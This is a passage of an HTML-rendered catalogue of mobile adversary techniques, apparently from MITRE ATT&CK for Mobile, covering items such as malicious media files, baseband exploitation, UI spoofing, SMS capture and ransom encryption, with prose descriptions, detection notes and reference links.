<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1045">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1045</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://jon.oberheide.org/files/summercon12-bouncer.pdf">https://jon.oberheide.org/files/summercon12-bouncer.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malicious_media_content_mob_t1060"><a class="anchor" href="#_malicious_media_content_mob_t1060"></a><a class="link" href="#_malicious_media_content_mob_t1060">Malicious Media Content - MOB-T1060</a></h3>
<div class="paragraph">
<p>Content of a media (audio or video) file could be designed to exploit vulnerabilities in parsers on the mobile device, as for example demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1360. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1060">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1060</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/">https://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_app_delivered_via_email_attachment_mob_t1037"><a class="anchor" href="#_app_delivered_via_email_attachment_mob_t1037"></a><a class="link" href="#_app_delivered_via_email_attachment_mob_t1037">App Delivered via Email Attachment - MOB-T1037</a></h3>
<div class="paragraph">
<p>The application is delivered as an email attachment.</p>
</div>
<div class="paragraph">
<p>Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1361. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1037">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html">https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_standard_application_layer_protocol_mob_t1040"><a class="anchor" href="#_standard_application_layer_protocol_mob_t1040"></a><a class="link" href="#_standard_application_layer_protocol_mob_t1040">Standard Application Layer Protocol - MOB-T1040</a></h3>
<div class="paragraph">
<p>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.</p>
</div>
<div class="paragraph">
<p>In the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. As described by Kaspersky (Citation: Kaspersky-MobileMalware), Google responds to reports of abuse by blocking access to GCM.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1362. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1040">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1040</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/">https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_and_directory_discovery_mob_t1023"><a class="anchor" href="#_file_and_directory_discovery_mob_t1023"></a><a class="link" href="#_file_and_directory_discovery_mob_t1023">File and Directory Discovery - MOB-T1023</a></h3>
<div class="paragraph">
<p>On Android, command line tools or the Java file APIs can be used to enumerate file system contents. However, Linux file permissions and SELinux policies generally strongly restrict what can be accessed by apps (without taking advantage of a privilege escalation exploit). The contents of the external storage directory are generally visible, which could present concern if sensitive data is inappropriately stored there.</p>
</div>
<div class="paragraph">
<p>iOS&#8217;s security architecture generally restricts the ability to perform file and directory discovery without use of escalated privileges.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1363. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1023">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1023</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wipe_device_data_mob_t1050"><a class="anchor" href="#_wipe_device_data_mob_t1050"></a><a class="link" href="#_wipe_device_data_mob_t1050">Wipe Device Data - MOB-T1050</a></h3>
<div class="paragraph">
<p>A malicious application could abuse Android device administrator access to wipe device contents, for example if a ransom is not paid.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1364. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1050">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1050</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_microphone_or_camera_recordings_mob_t1032">Microphone or Camera Recordings - MOB-T1032</a></h3>
<div class="paragraph">
<p>An adversary could use a malicious or exploited application to surreptitiously record activities using the device microphone and/or camera through use of standard operating system APIs.</p>
</div>
<div class="paragraph">
<p>Detection: On both Android (6.0 and up) and iOS, the user can view which applications have permission to use the microphone or the camera through the device settings screen, and the user can choose to revoke the permissions.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1365. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1032">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"><a class="anchor" href="#_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"></a><a class="link" href="#_malicious_or_vulnerable_built_in_device_functionality_mob_t1076">Malicious or Vulnerable Built-in Device Functionality - MOB-T1076</a></h3>
<div class="paragraph">
<p>The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1366. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1076">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1076</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscated_or_encrypted_payload_mob_t1009"><a class="anchor" href="#_obfuscated_or_encrypted_payload_mob_t1009"></a><a class="link" href="#_obfuscated_or_encrypted_payload_mob_t1009">Obfuscated or Encrypted Payload - MOB-T1009</a></h3>
<div class="paragraph">
<p>An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques, as described in (Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1367. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1009">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1009</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pages.cs.wisc.edu/" class="bare">http://pages.cs.wisc.edu/</a><sub>vrastogi/static/papers/rcj13b.pdf[<a href="http://pages.cs.wisc.edu/" class="bare">http://pages.cs.wisc.edu/</a></sub>vrastogi/static/papers/rcj13b.pdf]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://ieeexplore.ieee.org/document/6234407">http://ieeexplore.ieee.org/document/6234407</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/">http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/Shakacon/fruit-vs-zombies-defeat-nonjailbroken-ios-malware-by-claud-xiao">http://www.slideshare.net/Shakacon/fruit-vs-zombies-defeat-nonjailbroken-ios-malware-by-claud-xiao</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_user_interface_spoofing_mob_t1014"><a class="anchor" href="#_user_interface_spoofing_mob_t1014"></a><a class="link" href="#_user_interface_spoofing_mob_t1014">User Interface Spoofing - MOB-T1014</a></h3>
<div class="paragraph">
<p>At least three methods exist to perform User Interface Spoofing:</p>
</div>
<div class="paragraph">
<p>First, on both Android and iOS, an adversary could impersonate the user interface of a legitimate app or device function to trick a user into entering account credentials.</p>
</div>
<div class="paragraph">
<p>Second, on both Android and iOS, a malicious app could impersonate the identity of another app in order to trick users into installing and using it.</p>
</div>
<div class="paragraph">
<p>Third, on older versions of Android, a malicious app could abuse mobile operating system features to interfere with a running legitimate app as described in (Citation: Felt-PhishingOnMobileDevices) and (Citation: Hassell-ExploitingAndroid). However, this technique appears to have been addressed starting in Android 5.0 with the deprecation of the Android&#8217;s ActivityManager.getRunningTasks method and modification of its behavior (Citation: Android-getRunningTasks) and further addressed in Android 5.1.1 (Citation: StackOverflow-getRunningAppProcesses) to prevent a malicious app from determining what app is currently in the foreground.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1368. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1014">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://w2spconf.com/2011/papers/felt-mobilephishing.pdf">http://w2spconf.com/2011/papers/felt-mobilephishing.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://conference.hitb.org/hitbsecconf2011kul/materials/D1T1">http://conference.hitb.org/hitbsecconf2011kul/materials/D1T1</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29">https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag">http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_baseband_vulnerability_mob_t1058"><a class="anchor" href="#_exploit_baseband_vulnerability_mob_t1058"></a><a class="link" href="#_exploit_baseband_vulnerability_mob_t1058">Exploit Baseband Vulnerability - MOB-T1058</a></h3>
<div class="paragraph">
<p>A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device.</p>
</div>
<div class="olist upperalpha">
<ol class="upperalpha" type="A">
<li>
<p>Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference (Citation: Register-BaseStation).</p>
</li>
</ol>
</div>
<div class="paragraph">
<p>Weinmann described and demonstrated "the risk of remotely exploitable memory corruptions in cellular baseband stacks." (Citation: Weinmann-Baseband)</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1369. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1058">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1058</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-18.html">https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-18.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-19.html">https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-19.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.theregister.co.uk/2015/11/12/mobile%20pwn2own1/">http://www.theregister.co.uk/2015/11/12/mobile%20pwn2own1/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf">https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_process_discovery_mob_t1027"><a class="anchor" href="#_process_discovery_mob_t1027"></a><a class="link" href="#_process_discovery_mob_t1027">Process Discovery - MOB-T1027</a></h3>
<div class="paragraph">
<p>On Android versions prior to 5, applications can observe information about other processes that are running through methods in the ActivityManager class. On Android versions prior to 7, applications can obtain this information by executing the &lt;code&gt;ps&lt;/code&gt; command, or by examining the &lt;code&gt;/proc&lt;/code&gt; directory. Starting in Android version 7, use of the Linux kernel&#8217;s &lt;code&gt;hidepid&lt;/code&gt; feature prevents applications (without escalated privileges) from accessing this information (Citation: Android-SELinuxChanges).</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1370. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1027">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1027</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://code.google.com/p/android/issues/detail?id=205565">https://code.google.com/p/android/issues/detail?id=205565</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_abuse_device_administrator_access_to_prevent_removal_mob_t1004"><a class="anchor" href="#_abuse_device_administrator_access_to_prevent_removal_mob_t1004"></a><a class="link" href="#_abuse_device_administrator_access_to_prevent_removal_mob_t1004">Abuse Device Administrator Access to Prevent Removal - MOB-T1004</a></h3>
<div class="paragraph">
<p>A malicious application can request Device Administrator privileges. If the user grants the privileges, the application can take steps to make its removal more difficult.</p>
</div>
<div class="paragraph">
<p>Detection: The device user can view a list of apps with Device Administrator privilege in the device settings.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1371. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1004">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_app_delivered_via_web_download_mob_t1034"><a class="anchor" href="#_app_delivered_via_web_download_mob_t1034"></a><a class="link" href="#_app_delivered_via_web_download_mob_t1034">App Delivered via Web Download - MOB-T1034</a></h3>
<div class="paragraph">
<p>The application is downloaded from an arbitrary web site. A link to the application&#8217;s download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).</p>
</div>
<div class="paragraph">
<p>Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1372. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1034">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html">https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_capture_sms_messages_mob_t1015"><a class="anchor" href="#_capture_sms_messages_mob_t1015"></a><a class="link" href="#_capture_sms_messages_mob_t1015">Capture SMS Messages - MOB-T1015</a></h3>
<div class="paragraph">
<p>A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.</p>
</div>
<div class="paragraph">
<p>On Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement.</p>
</div>
<div class="paragraph">
<p>On iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1373. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1015">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1015</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_encrypt_files_for_ransom_mob_t1074"><a class="anchor" href="#_encrypt_files_for_ransom_mob_t1074"></a><a class="link" href="#_encrypt_files_for_ransom_mob_t1074">Encrypt Files for Ransom - MOB-T1074</a></h3>
<div class="paragraph">
<p>An adversary may encrypt files stored on the mobile device to prevent the user from accessing them, only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android, and we are unaware of any demonstrated use on iOS.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1374. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1074">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1074</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_abuse_of_ios_enterprise_app_signing_key_mob_t1048"><a class="anchor" href="#_abuse_of_ios_enterprise_app_signing_key_mob_t1048"></a><a class="link" href="#_abuse_of_ios_enterprise_app_signing_key_mob_t1048">Abuse of iOS Enterprise App Signing Key - MOB-T1048</a></h3>
<div class="paragraph">
<p>An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple&#8217;s App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).</p>
</div>
<div class="paragraph">
<p>Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple&#8217;s App Store.</p>
</div>
<div class="paragraph">
<p>Platforms: iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1375. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1048">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1048</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-23.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-23.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/Shakacon/fruit-vs-zombies-defeat-nonjailbroken-ios-malware-by-claud-xiao">http://www.slideshare.net/Shakacon/fruit-vs-zombies-defeat-nonjailbroken-ios-malware-by-claud-xiao</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_local_network_configuration_discovery_mob_t1025"><a class="anchor" href="#_local_network_configuration_discovery_mob_t1025"></a><a class="link" href="#_local_network_configuration_discovery_mob_t1025">Local Network Configuration Discovery - MOB-T1025</a></h3>
<div class="paragraph">
<p>On Android, details of onboard network interfaces are accessible to apps through the java.net. (Citation: NetworkInterface) class (Citation: NetworkInterface). The Android (Citation: TelephonyManager) class can be used to gather related information such as the IMSI, IMEI, and phone number (Citation: TelephonyManager).</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1376. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1025">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1025</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.android.com/reference/java/net/NetworkInterface.html">https://developer.android.com/reference/java/net/NetworkInterface.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.android.com/reference/android/telephony/TelephonyManager.html">https://developer.android.com/reference/android/telephony/TelephonyManager.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alternate_network_mediums_mob_t1041"><a class="anchor" href="#_alternate_network_mediums_mob_t1041"></a><a class="link" href="#_alternate_network_mediums_mob_t1041">Alternate Network Mediums - MOB-T1041</a></h3>
<div class="paragraph">
<p>Adversaries can communicate using cellular networks rather than enterprise Wi-Fi in order to bypass enterprise network monitoring systems. Adversaries may also communicate using other non-Internet Protocol mediums such as SMS, NFC, or Bluetooth to bypass network monitoring systems.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1377. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1041">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1041</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_local_network_connections_discovery_mob_t1024"><a class="anchor" href="#_local_network_connections_discovery_mob_t1024"></a><a class="link" href="#_local_network_connections_discovery_mob_t1024">Local Network Connections Discovery - MOB-T1024</a></h3>
<div class="paragraph">
<p>On Android, applications can use standard APIs to gather a list of network connections to and from the device. For example, the Network Connections app available in the Google Play Store (Citation: ConnMonitor) advertises this functionality.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1378. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1024">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://play.google.com/store/apps/details?id=com.antispycell.connmonitor&amp;hl=en">https://play.google.com/store/apps/details?id=com.antispycell.connmonitor&amp;hl=en</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
